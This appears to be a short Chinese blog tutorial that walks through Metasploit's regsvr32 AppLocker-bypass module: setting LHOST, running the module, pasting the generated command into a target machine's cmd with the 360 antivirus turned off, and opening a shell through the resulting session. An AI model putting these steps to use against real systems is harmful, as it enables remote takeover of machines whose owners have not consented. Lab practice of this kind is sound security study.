Regsvr32漏洞利用

进入工具之后,输入命令查看是否存在可以利用的 
exp【regsvr32_applocker_bypass_server】 

图片[1]-Regsvr32漏洞利用-

使用exp【exploit/windows/misc/regsvr32_applocker_bypass_server】 
使用命令【show options】查看当前需要设置的参数 

图片[2]-Regsvr32漏洞利用-

设置本机IP【LHOST】 
运行 

图片[3]-Regsvr32漏洞利用-

将上图的红色框生成的内容,在靶机cmd下运行(360会屏蔽,需要关闭360防护) 

图片[4]-Regsvr32漏洞利用-

成功之后,会有如下图的显示,输入命令【sessions】查看是否生成session对话, 
在使用命令【sessions 1(id)】连接对话 

图片[5]-Regsvr32漏洞利用-

输入命令【shell】,即可进入靶机命令行下,执行系统命令成功 

图片[6]-Regsvr32漏洞利用-
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片